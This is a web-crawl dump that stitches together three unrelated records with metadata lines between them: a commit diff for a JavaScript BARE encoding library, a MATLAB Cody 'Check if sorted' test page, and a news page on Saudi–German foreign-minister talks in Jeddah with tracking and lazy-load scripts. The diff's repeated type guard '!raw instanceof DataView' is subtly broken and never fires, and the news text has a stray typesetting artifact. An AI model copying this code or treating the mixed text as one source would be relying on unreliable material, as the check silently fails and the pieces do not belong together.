stored as a double precision float.\n-This limits the usable range of integers to 53 bits, which means the maximum unsigned value is just over 9 quadrillion `(10^15)`.\n+This limits the usable range of integers to 53 bits, which means the maximum unsigned value is just over 9 quadrillion `(10^15)`.\n+\nThere is the [BitInt](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt) type that allows arbitrary large integers.\n-But it has limitations; you can't use them in Math functions or beside regular Numbers.\n-Keep this in mind when using the variable length, and the 64 bit integer types, since these return a BigInt by default.\n+But it has limitations; you can't use them in Math functions or beside regular Numbers.\n+Keep this in mind when using the variable length, and the 64 bit integer types, since these return a BigInt by default.\n+\nThe lib provides `safeNumber` which will convert a BigInt to Number if it fits into 53 bits, or throw an Error if it does not fit if you just need a little more headroom.\n\n```\n`M example.js => example.js +42 -3`\n```@@ 42,6 42,38 @@ let test2 = {\n'uint': 365555,\n};\n\n+class ChannelEnum extends BARE.Enum {\n+\tstatic keys = BARE.mapEnum(this, {\n+\t\t0: 'RED',\n+\t\t1: 'BLUE',\n+\t\t2: 'GREEN',\n+\t\t10: 'ALL',\n+\t});\n+}\n+\n+class Pair extends BARE.Struct {\n+\tstatic entries = [\n+\t\t['channel', ChannelEnum],\n+\t\t['value', BARE.F64],\n+\t];\n+}\n+\n+class Test3 extends BARE.ArrayFixed {\n+\tstatic length = 2;\n+\tstatic type = Pair;\n+}\n+\n+let test3 = [\n+\t{\n+\t\tchannel: ChannelEnum.RED,\n+\t\tvalue: 2 * Math.PI,\n+\t},\n+\t{\n+\t\tchannel: ChannelEnum.ALL,\n+\t\tvalue: 6.9,\n+\t},\n+];\n+\nclass Address extends BARE.Struct {\nstatic entries = [\n['address', class extends BARE.ArrayFixed {\n\n@@ 72,17 104,24 @@ let addrTest = Uint8Array.from([\nconsole.log(test1);\nlet test1_bin = Test1.pack(test1);\nconsole.log(test1_bin);\n-\tlet test1_un = Test1.unpack(test1_bin);\n+\tlet [test1_un, t1l] = Test1.unpack(test1_bin);\nconsole.log(test1_un);\n\nconsole.log(\"-------------------\");\nconsole.log(test2);\nlet test2_bin = Test2.pack(test2);\nconsole.log(test2_bin);\n-\tlet test2_un = Test2.unpack(test2_bin);\n+\tlet [test2_un, t2l] = Test2.unpack(test2_bin);\nconsole.log(test2_un);\n\nconsole.log(\"-------------------\");\n-\tlet addr = Address.unpack(addrTest);\n+\tconsole.log(test3);\n+\tlet test3_bin = Test3.pack(test3);\n+\tconsole.log(test3_bin);\n+\tlet [test3_un, t3l] = Test3.unpack(test3_bin);\n+\tconsole.log(test3_un);\n+\n+\tconsole.log(\"-------------------\");\n+\tlet [addr, al] = Address.unpack(addrTest);\nconsole.log(addr);\n})();=\n\\ No newline at end of file\n\n```\n`M lib-bare.js => lib-bare.js +55 -7`\n```@@ 19,6 19,16 @@ function twoWayMap(pairs) {\nreturn map;\n}\n\n+function reverseMapping(obj) {\n+\tlet entries = Object.entries(obj);\n+\tlet reverse = {};\n+\tfor (let i = 0; i < entries.length; i++) {\n+\t\tlet [key, val] = entries[i];\n+\t\treverse[val] = key;\n+\t}\n+\treturn reverse;\n+}\n+\nfunction safeNumber(bigInt) {\nif (bigInt > MAX_U53 || bigInt < -MAX_U53) {\nthrow RangeError(\"BigInt value out of double precision range (53 bits)\");\n\n@@ 266,19 276,39 @@ class BareBool extends BarePrimitive {\n}\n}\n\n-// TODO how (and where) to represent/store possible values for an enum (since js doesn't have an enum type)\n+function mapEnum(enumClass, keys) {\n+\tlet entries = Object.entries(keys);\n+\tfor (let i = 0; i < entries.length; i++) {\n+\t\tlet [key, name] = entries[i];\n+\t\tenumClass[name] = key;\n+\t}\n+\treturn keys;\n+}\nclass BareEnum extends BarePrimitive {\n-\tstatic values; // = twoWayMap([['name', n], ...])\n+\t// alternatively an array with gaps is allowed: ['ONE', 'TWO', , , 'FIVE']\n+\t// this can also be done by index after the class definition:\n+\t// Enum.keys = 'SPECIAL';\n+\t// although you then have to run mapEnum after that\n+\tstatic keys; // = mapEnum(this, {0:'NAME1', 1:'NAME2', 4:'NAME5', ...})\n\n-\tstatic pack(obj) {\n-\t\tlet num = this.values[obj];\n+\tstatic pack(value) {\n+\t\tif (!this.keys[value]) {\n+\t\t\tthrow ReferenceError(\"Invalid enum value\");\n+\t\t}\n+\t\tlet num = BigInt(value);\nreturn BareUInt.pack(num);\n}\n\nstatic unpack(raw) {\nlet [value, bytes] = BareUInt.unpack(raw);\n-\t\tlet name = this.values[value];\n-\t\treturn [name, bytes];\n+\t\tif (value > MAX_U32) {\n+\t\t\tthrow RangeError(\"Enum value out of range\");\n+\t\t}\n+\t\tif (!this.keys[value]) {\n+\t\t\tthrow ReferenceError(\"Invalid enum value\");\n+\t\t}\n+\t\tvalue = Number(value);\n+\t\treturn [value, bytes];\n}\n}\n\n@@ 362,6 392,10 @@ class BareOptional extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet status = raw.getUint8(0);\nif (status === 0) {\nreturn [undefined, 1];\n\n@@ 411,6 445,10 @@ class BareArray extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet obj = [];\nlet [numElements, length] = BareUInt.unpack(raw);\nif (numElements > MAX_ARRAY_LENGTH) {\n\n@@ 445,6 483,10 @@ class BareMap extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet obj = {};\nlet [numEntries, length] = BareUInt.unpack(raw);\nif (numEntries > MAX_MAP_LENGTH) {\n\n@@ 483,6 525,10 @@ class BareUnion extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet [index, length] = BareUInt.unpack(raw);\nlet objType = this.types[index];\nlet [obj, bytes] = objType.unpack(new DataView(raw.buffer, raw.byteOffset + length));\n\n@@ 514,12 560,14 @@ class BareStruct extends BareType {\nlength += bytes;\nobj[key] = value;\n}\n-\t\treturn obj;\n+\t\treturn [obj, length];\n}\n}\n\nmodule.exports = {\ntwoWayMap: twoWayMap,\n+\treverseMapping: reverseMapping,\n+\tmapEnum: mapEnum,\nsafeNumber: safeNumber,\nUInt: BareUInt,\nInt: BareInt,\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5841392,"math_prob":0.9695364,"size":7425,"snap":"2021-21-2021-25","text_gpt3_token_len":1989,"char_repetition_ratio":0.11359655,"word_repetition_ratio":0.28356963,"special_character_ratio":0.33171716,"punctuation_ratio":0.21788502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97250414,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-15T08:54:44Z\",\"WARC-Record-ID\":\"<urn:uuid:1cba40ba-88c2-4200-ade6-58a09b714b5a>\",\"Content-Length\":\"50566\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:be396305-ec25-4ddc-be7b-82f7cc9a5fff>\",\"WARC-Concurrent-To\":\"<urn:uuid:7b518ca8-357d-44bc-b4ce-daa97069a787>\",\"WARC-IP-Address\":\"173.195.146.142\",\"WARC-Target-URI\":\"https://git.sr.ht/~kiito/bare-js/commit/1746c5aa62555c0f8b3b9644f60b021a08d303e3\",\"WARC-Payload-Digest\":\"sha1:YJLROF2ZKRRHAZXCK32DJ6OE7N6JAYP3\",\"WARC-Block-Digest\":\"sha1:SSQLGFJ7JPRXV7RZ6U2ZEQQ25YJKQXFV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487620971.25_warc_CC-MAIN-20210615084235-20210615114235-00082.warc.gz\"}"}
https://www.mathworks.com/matlabcentral/cody/problems/109-check-if-sorted/solutions/1262570
[ "Cody\n\n# Problem 109. Check if sorted\n\nSolution 1262570\n\nSubmitted on 5 Sep 2017 by Gabriel Delcros\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = sort(rand(1,10^5)); y_correct = 1; assert(isequal(sortok(x),y_correct))\n\ntaille = 100000\n\n2   Pass\nx = [1 5 4 3 8 7 3]; y_correct = 0; assert(isequal(sortok(x),y_correct))\n\ntaille = 7" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5848634,"math_prob":0.976364,"size":457,"snap":"2020-24-2020-29","text_gpt3_token_len":149,"char_repetition_ratio":0.13686535,"word_repetition_ratio":0.0,"special_character_ratio":0.36105034,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96612304,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T15:28:54Z\",\"WARC-Record-ID\":\"<urn:uuid:d9397e29-6269-4653-a71e-58cf0e0e3c24>\",\"Content-Length\":\"76020\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:da64bbf8-1c9c-4cdb-9630-5190864aee3f>\",\"WARC-Concurrent-To\":\"<urn:uuid:7ae3d0df-38a1-4795-a483-f2c4278ef3b3>\",\"WARC-IP-Address\":\"23.66.56.59\",\"WARC-Target-URI\":\"https://www.mathworks.com/matlabcentral/cody/problems/109-check-if-sorted/solutions/1262570\",\"WARC-Payload-Digest\":\"sha1:YH6TZUQB2WXGDMS6GDQXDWZKEQVLQXYG\",\"WARC-Block-Digest\":\"sha1:SRFTRFBC34PSELJ2K747FZVKIAMP2WLH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655900335.76_warc_CC-MAIN-20200709131554-20200709161554-00429.warc.gz\"}"}
https://newshuntexpress.com/saudi-german-foreign-ministers-hold-talks-in-jeddah/
[ "Allways With You\n\n# Saudi, German foreign ministers hold talks in Jeddah", null, "JEDDAH — Foreign Minister Prince Faisal Bin Farhan and German Foreign Minister Annalena Baerbock held official talks in Jeddah on Monday.\n\nThey emphasized the importance of concerted efforts at all levels to achieve common goals.\n\nThey also discussed ways to enhance bilateral efforts in establishing the foundations for regional and global peace.\n\nThe two sides reviewed bilateral relations and discussed ways to enhance and develop them for the benefit of both countries.\n\nThey also focused on strengthening bilateral coordination on various regional and international issues, particularly in the political, security, and economic domains.\n\nThe German foreign minister expressed gratitude and appreciation for the Kingdom’s successful evacuation of German nationals from Sudan.\n\nShe acknowledged the high efficiency of the Saudi authorities in carrying out these operations.\n\nPrince Abdullah Bin Khalid Bin Sultan, Saudi Ambassador to Germany, and Ambassador Dr. Saud Bin Mohammed Al Sati, undersecretary of the Foreign Ministry for Political Affairs, was present during the session. \\begingroup SG\n\n#### `You missed`\n\n``` International ```\n\n#### ` France fails to tackle growing gang problem`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` Pakistan orders 1.7 million Afghans out of country`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` TikTok halts online shopping service in Indonesia`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` Boat carrying 280 migrants lands in Canary Islands`\n\n``` Oct 4, 2023 newshuntexpress```\n``` Manage Cookie Consent To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions. Functional Functional Always active The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network. Preferences Preferences The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user. Statistics Statistics The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you. Marketing Marketing The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes. Manage options Manage services Manage vendors Read more about these purposes View preferences {title} {title} {title} window.gtranslateSettings=window.gtranslateSettings||{};window.gtranslateSettings['39445477']={\"default_language\":\"en\",\"languages\":[\"hi\",\"en\",\"ne\",\"bn\",\"ar\",\"ur\"],\"url_structure\":\"none\",\"flag_style\":\"3d\",\"flag_size\":16,\"wrapper_selector\":\"#gt-wrapper-39445477\",\"alt_flags\":[],\"switcher_open_direction\":\"top\",\"switcher_horizontal_position\":\"right\",\"switcher_vertical_position\":\"top\",\"switcher_text_color\":\"#666\",\"switcher_arrow_color\":\"#666\",\"switcher_border_color\":\"#ccc\",\"switcher_background_color\":\"#fff\",\"switcher_background_shadow_color\":\"#dd3333\",\"switcher_background_hover_color\":\"#fff\",\"dropdown_text_color\":\"#000\",\"dropdown_hover_color\":\"#fff\",\"dropdown_background_color\":\"#eee\",\"flags_location\":\"\\/wp-content\\/plugins\\/gtranslate\\/flags\\/\"} var mi_version = '8.19'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStrs = [ 'ga-disable-G-HJ788Z9FQZ', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for (var index = 0; index < disableStrs.length; index++) { if (document.cookie.indexOf(disableStrs[index] + '=true') > -1) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if (__gtagTrackerIsOptedOut()) { for (var index = 0; index < disableStrs.length; index++) { window[disableStrs[index]] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for (var index = 0; index < disableStrs.length; index++) { document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStrs[index]] = true; } } if ('undefined' === typeof gaOptout) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.MonsterInsightsDualTracker = { helpers: {}, trackers: {}, }; if (mi_track_user) { function __gtagDataLayer() { dataLayer.push(arguments); } function __gtagTracker(type, name, parameters) { if (!parameters) { parameters = {}; } if (parameters.send_to) { __gtagDataLayer.apply(null, arguments); return; } if (type === 'event') { parameters.send_to = monsterinsights_frontend.v4_id; var hookName = name; if (typeof parameters['event_category'] !== 'undefined') { hookName = parameters['event_category'] + ':' + name; } if (typeof MonsterInsightsDualTracker.trackers[hookName] !== 'undefined') { MonsterInsightsDualTracker.trackers[hookName](parameters); } else { __gtagDataLayer('event', name, parameters); } } else { __gtagDataLayer.apply(null, arguments); } } __gtagTracker('js', new Date()); __gtagTracker('set', { 'developer_id.dZGIzZG': true, }); __gtagTracker('config', 'G-HJ788Z9FQZ', {\"forceSSL\":\"true\",\"link_attribution\":\"true\"} ); window.gtag = __gtagTracker; (function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. */ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function () { var args = Array.prototype.slice.call(arguments); args.unshift('send'); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if (len === 0) { return; } var f = arguments[len - 1]; if (typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function') { if ('send' === arguments) { var hitConverted, hitObject = false, action; if ('event' === arguments) { if ('undefined' !== typeof arguments) { hitObject = { 'eventAction': arguments, 'eventCategory': arguments, 'eventLabel': arguments, 'value': arguments ? arguments : 1, } } } if ('pageview' === arguments) { if ('undefined' !== typeof arguments) { hitObject = { 'eventAction': 'page_view', 'page_path': arguments, } } } if (typeof arguments === 'object') { hitObject = arguments; } if (typeof arguments === 'object') { Object.assign(hitObject, arguments); } if ('undefined' !== typeof arguments.hitType) { hitObject = arguments; if ('pageview' === hitObject.hitType) { hitObject.eventAction = 'page_view'; } } if (hitObject) { action = 'timing' === arguments.hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs(hitObject); __gtagTracker('event', action, hitConverted); } } return; } function mapArgs(args) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page': 'page_path', 'location': 'page_location', 'title': 'page_title', }; for (arg in args) { if (!(!args.hasOwnProperty(arg) || !gaMap.hasOwnProperty(arg))) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; })(); } else { console.log(\"\"); (function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; })(); } !function(t,e){\"object\"==typeof exports&&\"undefined\"!=typeof module?module.exports=e():\"function\"==typeof define&&define.amd?define(e):(t=\"undefined\"!=typeof globalThis?globalThis:t||self).LazyLoad=e()}(this,function(){\"use strict\";function e(){return(e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n,a=arguments[e];for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(t[n]=a[n])}return t}).apply(this,arguments)}function i(t){return e({},it,t)}function o(t,e){var n,a=\"LazyLoad::Initialized\",i=new t(e);try{n=new CustomEvent(a,{detail:{instance:i}})}catch(t){(n=document.createEvent(\"CustomEvent\")).initCustomEvent(a,!1,!1,{instance:i})}window.dispatchEvent(n)}function l(t,e){return t.getAttribute(gt+e)}function c(t){return l(t,bt)}function s(t,e){return function(t,e,n){e=gt+e;null!==n?t.setAttribute(e,n):t.removeAttribute(e)}(t,bt,e)}function r(t){return s(t,null),0}function u(t){return null===c(t)}function d(t){return c(t)===vt}function f(t,e,n,a){t&&(void 0===a?void 0===n?t(e):t(e,n):t(e,n,a))}function _(t,e){nt?t.classList.add(e):t.className+=(t.className?\" \":\"\")+e}function v(t,e){nt?t.classList.remove(e):t.className=t.className.replace(new RegExp(\"(^|\\\\s+)\"+e+\"(\\\\s+|\\$)\"),\" \").replace(/^\\s+/,\"\").replace(/\\s+\\$/,\"\")}function g(t){return t.llTempImage}function b(t,e){!e||(e=e._observer)&&e.unobserve(t)}function p(t,e){t&&(t.loadingCount+=e)}function h(t,e){t&&(t.toLoadCount=e)}function n(t){for(var e,n=[],a=0;e=t.children[a];a+=1)\"SOURCE\"===e.tagName&&n.push(e);return n}function m(t,e){(t=t.parentNode)&&\"PICTURE\"===t.tagName&&n(t).forEach(e)}function a(t,e){n(t).forEach(e)}function E(t){return!!t[st]}function I(t){return t[st]}function y(t){return delete t[st]}function A(e,t){var n;E(e)||(n={},t.forEach(function(t){n[t]=e.getAttribute(t)}),e[st]=n)}function k(a,t){var i;E(a)&&(i=I(a),t.forEach(function(t){var e,n;e=a,(t=i[n=t])?e.setAttribute(n,t):e.removeAttribute(n)}))}function L(t,e,n){_(t,e.class_loading),s(t,ut),n&&(p(n,1),f(e.callback_loading,t,n))}function w(t,e,n){n&&t.setAttribute(e,n)}function x(t,e){w(t,ct,l(t,e.data_sizes)),w(t,rt,l(t,e.data_srcset)),w(t,ot,l(t,e.data_src))}function O(t,e,n){var a=l(t,e.data_bg_multi),i=l(t,e.data_bg_multi_hidpi);(a=at&&i?i:a)&&(t.style.backgroundImage=a,n=n,_(t=t,(e=e).class_applied),s(t,ft),n&&(e.unobserve_completed&&b(t,e),f(e.callback_applied,t,n)))}function N(t,e){!e||0<e.loadingCount||0<e.toLoadCount||f(t.callback_finish,e)}function C(t,e,n){t.addEventListener(e,n),t.llEvLisnrs[e]=n}function M(t){return!!t.llEvLisnrs}function z(t){if(M(t)){var e,n,a=t.llEvLisnrs;for(e in a){var i=a[e];n=e,i=i,t.removeEventListener(n,i)}delete t.llEvLisnrs}}function R(t,e,n){var a;delete t.llTempImage,p(n,-1),(a=n)&&--a.toLoadCount,v(t,e.class_loading),e.unobserve_completed&&b(t,n)}function T(o,r,c){var l=g(o)||o;M(l)||function(t,e,n){M(t)||(t.llEvLisnrs={});var a=\"VIDEO\"===t.tagName?\"loadeddata\":\"load\";C(t,a,e),C(t,\"error\",n)}(l,function(t){var e,n,a,i;n=r,a=c,i=d(e=o),R(e,n,a),_(e,n.class_loaded),s(e,dt),f(n.callback_loaded,e,a),i||N(n,a),z(l)},function(t){var e,n,a,i;n=r,a=c,i=d(e=o),R(e,n,a),_(e,n.class_error),s(e,_t),f(n.callback_error,e,a),i||N(n,a),z(l)})}function G(t,e,n){var a,i,o,r,c;t.llTempImage=document.createElement(\"IMG\"),T(t,e,n),E(c=t)||(c[st]={backgroundImage:c.style.backgroundImage}),o=n,r=l(a=t,(i=e).data_bg),c=l(a,i.data_bg_hidpi),(r=at&&c?c:r)&&(a.style.backgroundImage='url(\"'.concat(r,'\")'),g(a).setAttribute(ot,r),L(a,i,o)),O(t,e,n)}function D(t,e,n){var a;T(t,e,n),a=e,e=n,(t=It[(n=t).tagName])&&(t(n,a),L(n,a,e))}function V(t,e,n){var a;a=t,(-1<yt.indexOf(a.tagName)?D:G)(t,e,n)}function F(t,e,n){var a;t.setAttribute(\"loading\",\"lazy\"),T(t,e,n),a=e,(e=It[(n=t).tagName])&&e(n,a),s(t,vt)}function j(t){t.removeAttribute(ot),t.removeAttribute(rt),t.removeAttribute(ct)}function P(t){m(t,function(t){k(t,Et)}),k(t,Et)}function S(t){var e;(e=At[t.tagName])?e(t):E(e=t)&&(t=I(e),e.style.backgroundImage=t.backgroundImage)}function U(t,e){var n;S(t),n=e,u(e=t)||d(e)||(v(e,n.class_entered),v(e,n.class_exited),v(e,n.class_applied),v(e,n.class_loading),v(e,n.class_loaded),v(e,n.class_error)),r(t),y(t)}function \\$(t,e,n,a){var i;n.cancel_on_exit&&(c(t)!==ut||\"IMG\"===t.tagName&&(z(t),m(i=t,function(t){j(t)}),j(i),P(t),v(t,n.class_loading),p(a,-1),r(t),f(n.callback_cancel,t,e,a)))}function q(t,e,n,a){var i,o,r=(o=t,0<=pt.indexOf(c(o)));s(t,\"entered\"),_(t,n.class_entered),v(t,n.class_exited),i=t,o=a,n.unobserve_entered&&b(i,o),f(n.callback_enter,t,e,a),r||V(t,n,a)}function H(t){return t.use_native&&\"loading\"in HTMLImageElement.prototype}function B(t,i,o){t.forEach(function(t){return(a=t).isIntersecting||0<a.intersectionRatio?q(t.target,t,i,o):(e=t.target,n=t,a=i,t=o,void(u(e)||(_(e,a.class_exited),\\$(e,n,a,t),f(a.callback_exit,e,n,t))));var e,n,a})}function J(e,n){var t;et&&!H(e)&&(n._observer=new IntersectionObserver(function(t){B(t,e,n)},{root:(t=e).container===document?null:t.container,rootMargin:t.thresholds||t.threshold+\"px\"}))}function K(t){return Array.prototype.slice.call(t)}function Q(t){return t.container.querySelectorAll(t.elements_selector)}function W(t){return c(t)===_t}function X(t,e){return e=t||Q(e),K(e).filter(u)}function Y(e,t){var n;(n=Q(e),K(n).filter(W)).forEach(function(t){v(t,e.class_error),r(t)}),t.update()}function t(t,e){var n,a,t=i(t);this._settings=t,this.loadingCount=0,J(t,this),n=t,a=this,Z&&window.addEventListener(\"online\",function(){Y(n,a)}),this.update(e)}var Z=\"undefined\"!=typeof window,tt=Z&&!(\"onscroll\"in window)||\"undefined\"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),et=Z&&\"IntersectionObserver\"in window,nt=Z&&\"classList\"in document.createElement(\"p\"),at=Z&&1<window.devicePixelRatio,it={elements_selector:\".lazy\",container:tt||Z?document:null,threshold:300,thresholds:null,data_src:\"src\",data_srcset:\"srcset\",data_sizes:\"sizes\",data_bg:\"bg\",data_bg_hidpi:\"bg-hidpi\",data_bg_multi:\"bg-multi\",data_bg_multi_hidpi:\"bg-multi-hidpi\",data_poster:\"poster\",class_applied:\"applied\",class_loading:\"litespeed-loading\",class_loaded:\"litespeed-loaded\",class_error:\"error\",class_entered:\"entered\",class_exited:\"exited\",unobserve_completed:!0,unobserve_entered:!1,cancel_on_exit:!0,callback_enter:null,callback_exit:null,callback_applied:null,callback_loading:null,callback_loaded:null,callback_error:null,callback_finish:null,callback_cancel:null,use_native:!1},ot=\"src\",rt=\"srcset\",ct=\"sizes\",lt=\"poster\",st=\"llOriginalAttrs\",ut=\"loading\",dt=\"loaded\",ft=\"applied\",_t=\"error\",vt=\"native\",gt=\"data-\",bt=\"ll-status\",pt=[ut,dt,ft,_t],ht=[ot],mt=[ot,lt],Et=[ot,rt,ct],It={IMG:function(t,e){m(t,function(t){A(t,Et),x(t,e)}),A(t,Et),x(t,e)},IFRAME:function(t,e){A(t,ht),w(t,ot,l(t,e.data_src))},VIDEO:function(t,e){a(t,function(t){A(t,ht),w(t,ot,l(t,e.data_src))}),A(t,mt),w(t,lt,l(t,e.data_poster)),w(t,ot,l(t,e.data_src)),t.load()}},yt=[\"IMG\",\"IFRAME\",\"VIDEO\"],At={IMG:P,IFRAME:function(t){k(t,ht)},VIDEO:function(t){a(t,function(t){k(t,ht)}),k(t,mt),t.load()}},kt=[\"IMG\",\"IFRAME\",\"VIDEO\"];return t.prototype={update:function(t){var e,n,a,i=this._settings,o=X(t,i);{if(h(this,o.length),!tt&&et)return H(i)?(e=i,n=this,o.forEach(function(t){-1!==kt.indexOf(t.tagName)&&F(t,e,n)}),void h(n,0)):(t=this._observer,i=o,t.disconnect(),a=t,void i.forEach(function(t){a.observe(t)}));this.loadAll(o)}},destroy:function(){this._observer&&this._observer.disconnect(),Q(this._settings).forEach(function(t){y(t)}),delete this._observer,delete this._settings,delete this.loadingCount,delete this.toLoadCount},loadAll:function(t){var e=this,n=this._settings;X(t,n).forEach(function(t){b(t,e),V(t,n,e)})},restoreAll:function(){var e=this._settings;Q(e).forEach(function(t){U(t,e)})}},t.load=function(t,e){e=i(e);V(t,e)},t.resetStatus=function(t){r(t)},Z&&function(t,e){if(e)if(e.length)for(var n,a=0;n=e[a];a+=1)o(t,n);else o(t,e)}(t,window.lazyLoadOptions),t});!function(e,t){\"use strict\";function a(){t.body.classList.add(\"litespeed_lazyloaded\")}function n(){console.log(\"[LiteSpeed] Start Lazy Load Images\"),d=new LazyLoad({elements_selector:\"[data-lazyloaded]\",callback_finish:a}),o=function(){d.update()},e.MutationObserver&&new MutationObserver(o).observe(t.documentElement,{childList:!0,subtree:!0,attributes:!0})}var d,o;e.addEventListener?e.addEventListener(\"load\",n,!1):e.attachEvent(\"onload\",n)}(window,document);var litespeed_vary=document.cookie.replace(/(?:(?:^|.*;\\s*)_lscache_vary\\s*\\=\\s*([^;]*).*\\$)|^.*\\$/,\"\");litespeed_vary||fetch(\"/wp-content/plugins/litespeed-cache/guest.vary.php\",{method:\"POST\",cache:\"no-cache\",redirect:\"follow\"}).then(e=>e.json()).then(e=>{console.log(e),e.hasOwnProperty(\"reload\")&&\"yes\"==e.reload&&(sessionStorage.setItem(\"litespeed_docref\",document.referrer),window.location.reload(!0))});const litespeed_ui_events=[\"mouseover\",\"click\",\"keydown\",\"wheel\",\"touchmove\",\"touchstart\"];var urlCreator=window.URL||window.webkitURL;function litespeed_load_delayed_js_force(){console.log(\"[LiteSpeed] Start Load JS Delayed\"),litespeed_ui_events.forEach(e=>{window.removeEventListener(e,litespeed_load_delayed_js_force,{passive:!0})}),document.querySelectorAll(\"iframe[data-litespeed-src]\").forEach(e=>{e.setAttribute(\"src\",e.getAttribute(\"data-litespeed-src\"))}),\"loading\"==document.readyState?window.addEventListener(\"DOMContentLoaded\",litespeed_load_delayed_js):litespeed_load_delayed_js()}litespeed_ui_events.forEach(e=>{window.addEventListener(e,litespeed_load_delayed_js_force,{passive:!0})});async function litespeed_load_delayed_js(){let t=[];for(var d in document.querySelectorAll('script[type=\"litespeed/javascript\"]').forEach(e=>{t.push(e)}),t)await new Promise(e=>litespeed_load_one(t[d],e));document.dispatchEvent(new Event(\"DOMContentLiteSpeedLoaded\")),window.dispatchEvent(new Event(\"DOMContentLiteSpeedLoaded\"))}function litespeed_load_one(t,e){console.log(\"[LiteSpeed] Load \",t);var d=document.createElement(\"script\");d.addEventListener(\"load\",e),d.addEventListener(\"error\",e),t.getAttributeNames().forEach(e=>{\"type\"!=e&&d.setAttribute(\"data-src\"==e?\"src\":e,t.getAttribute(e))});let a=!(d.type=\"text/javascript\");!d.src&&t.textContent&&(d.src=litespeed_inline2src(t.textContent),a=!0),t.after(d),t.remove(),a&&e()}function litespeed_inline2src(t){try{var d=urlCreator.createObjectURL(new Blob([t.replace(/^(?:<!--)?(.*?)(?:-->)?\\$/gm,\"\\$1\")],{type:\"text/javascript\"}))}catch(e){d=\"data:text/javascript;base64,\"+btoa(t.replace(/^(?:<!--)?(.*?)(?:-->)?\\$/gm,\"\\$1\"))}return d} ```" ]
